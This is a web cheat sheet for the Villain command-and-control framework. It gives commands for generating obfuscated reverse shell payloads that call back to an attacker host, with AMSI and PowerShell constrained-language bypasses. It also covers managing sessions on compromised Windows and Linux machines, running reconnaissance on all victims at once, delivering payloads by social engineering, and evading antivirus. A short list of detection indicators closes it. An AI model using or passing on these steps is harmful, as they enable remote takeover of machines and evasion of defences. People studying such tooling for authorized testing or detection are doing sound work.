← All cheat sheets

VILLAIN

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Python-based C2 framework for generating and managing reverse shell
sessions across Windows and Linux targets. Supports multi-session
handling, command routing, and team collaboration.

INSTALLATION & SETUP#

# Clone and install
git clone https://github.com/t3l3machus/Villain
cd Villain
pip install -r requirements.txt

# Or with pipx
pipx install villain

# Start Villain
python3 Villain.py

# Start with custom port
python3 Villain.py -p 6501

# Start with specific interface
python3 Villain.py -i 0.0.0.0 -p 6501

# Quiet mode
python3 Villain.py -q

GENERATING PAYLOADS#

# In Villain shell:

# Full syntax
Villain > generate payload=<OS/HANDLER/TEMPLATE> lhost=<IP_OR_IFACE> [obfuscate] [encode]

# Windows reverse TCP (PowerShell)
Villain > generate payload=windows/reverse_tcp/powershell lhost=eth0 encode

# Windows HoaxShell (HTTP-based)
Villain > generate payload=windows/hoaxshell/powershell lhost=eth0 obfuscate

# Linux reverse TCP
Villain > generate payload=linux/reverse_tcp/bash lhost=eth0

# Linux HoaxShell
Villain > generate payload=linux/hoaxshell/sh_curl lhost=eth0 obfuscate

# Payload types
  - Windows: PowerShell-based reverse shell (hoaxshell)
  - Linux:   Bash/Python-based reverse shell

# hoaxshell integration (Windows)
  Villain integrates hoaxshell for Windows payloads
  Uses constrained language mode bypass techniques
  HTTP-based reverse shell via legitimate Windows processes

LISTENERS#

# Listeners are created automatically with payload generation
# Default: HTTP-based listeners

# List active listeners
Villain > listeners

# Custom listener port
Villain > generate os=windows lhost=ATTACKER_IP lport=8443

SESSION MANAGEMENT#

# List active sessions
Villain > sessions

# Interact with a session
Villain > shell SESSION_ID

# Background a session
Ctrl+C or type "back"

# Kill a session
Villain > kill SESSION_ID

# Session info
Villain > sessions -i SESSION_ID

COMMANDS#

# Shell commands (within a session, use "shell SESSION_ID" first)
Villain (SESSION) > whoami
Villain (SESSION) > dir
Villain (SESSION) > ipconfig
Villain (SESSION) > type C:\flag.txt

# Upload file to target (from within shell session)
upload /local/path /remote/path

# Fileless script execution (HTTP-loaded, in-memory)
inject /path/to/local/script.ps1

# Interactive Windows shell (ConPTY, PowerShell sessions only)
conptyshell eth0 4444 SESSION_ID

# Command inspector (catch mistakes that hang shells)
cmdinspector ON
cmdinspector OFF

MULTI-SESSION OPERATIONS#

# Execute on all active sessions
Villain > exec_all "whoami"
Villain > exec_all "hostname"

# Useful for mass reconnaissance
Villain > exec_all "systeminfo | findstr /B /C:\"OS\""
Villain > exec_all "net user"

TEAM SERVER (SIBLING SERVERS)#

# Villain supports multi-operator collaboration
# Connect Villain instances together

# Connect to sibling server (default team port: 65001)
Villain > connect SIBLING_IP 65001

# Chat with connected teammates (prefix with #)
Villain > #Hello team, I have new sessions

# Exit without killing sessions (HoaxShell sessions auto-reconnect)
Villain > flee

# Purge stored session metadata
Villain > purge

CONPTYSHELL (INTERACTIVE SHELL)#

# Upgrade to fully interactive PTY shell (Windows)
# Avoids PowerShell constrained language mode issues

# Within a session:
Villain > conptyshell SESSION_ID

BUILT-IN FEATURES#

  - Automatic payload obfuscation
  - AMSI bypass in Windows payloads
  - HTTP-based C2 communication
  - Session persistence across restarts
  - Command history per session
  - Tab completion
  - Multi-OS payload support
  - Sibling server collaboration
  - hoaxshell integration for stealth

PAYLOAD OBFUSCATION#

# Automatic obfuscation flag
Villain > generate os=windows lhost=IP lport=PORT obfuscate

# Obfuscation techniques applied:
  - Variable name randomization
  - String concatenation and splitting
  - Base64 encoding layers
  - PowerShell escape character insertion
  - Case randomization

KEY OPTIONS & FLAGS#

Flag        Description                    Default
----        -----------                    -------
-i          Listen interface               0.0.0.0
-p          Listen port                    6501
-q          Quiet mode                     false
-c          Cert file for HTTPS            auto-generated
-k          Key file for HTTPS             auto-generated

COMMANDS REFERENCE#

Command         Description
-------         -----------
generate        Create reverse shell payload
sessions        List active sessions
shell           Interact with session
kill            Terminate a session
upload          Upload file to target
download        Download file from target
exec_all        Execute on all sessions
alias           Manage command aliases
connect         Connect to sibling server
listeners       List active listeners
conptyshell     Upgrade to ConPTY shell
help            Show help
clear           Clear screen
exit            Exit Villain

WORKFLOW EXAMPLE#

# 1. Start Villain
python3 Villain.py -p 6501

# 2. Generate payload
Villain > generate os=windows lhost=10.10.14.1 lport=8443 obfuscate

# 3. Deliver payload to target (social engineering, exploit, etc.)

# 4. Wait for callback
# [+] Session established: SESSION_ID

# 5. Interact
Villain > shell SESSION_ID
Villain (SESSION) > whoami
Villain (SESSION) > systeminfo

# 6. Pivot or escalate as needed

COMPARISON WITH OTHER C2#

Feature         Villain    Cobalt Strike   Sliver    Havoc
-------         -------    -------------   ------    -----
License         OSS        Commercial      OSS       OSS
Language        Python     Java            Go        Go/C++
Setup           Simple     Moderate        Simple    Moderate
Complexity      Low        High            Medium    Medium
Platforms       Win/Lin    Win/Lin/Mac     All       Windows
GUI             CLI        Java GUI        CLI       Qt GUI
BOF Support     No         Yes             Yes       Yes
Sleep Obfusc.   No         Limited         No        Yes
Best For        Quick ops  Full engagmt    Modern C2 Evasion

OPSEC CONSIDERATIONS#

  - HTTP-based C2 (no encryption by default without HTTPS)
  - Enable HTTPS with -c and -k for encrypted communication
  - Obfuscate payloads to bypass basic AV detection
  - hoaxshell-based payloads use legitimate Windows processes
  - Simple C2 = smaller footprint = harder to fingerprint
  - Not designed for long-term persistent operations
  - Best suited for initial access and quick post-exploitation
  - Combine with more robust C2 for extended operations
  - PowerShell execution may trigger script block logging

DETECTION INDICATORS#

  - PowerShell execution with encoded commands
  - HTTP callbacks to non-standard ports
  - Process execution patterns from reverse shell
  - PowerShell constrained language mode bypass attempts
  - AMSI bypass patterns in PowerShell logs
  - Unusual child processes from powershell.exe or cmd.exe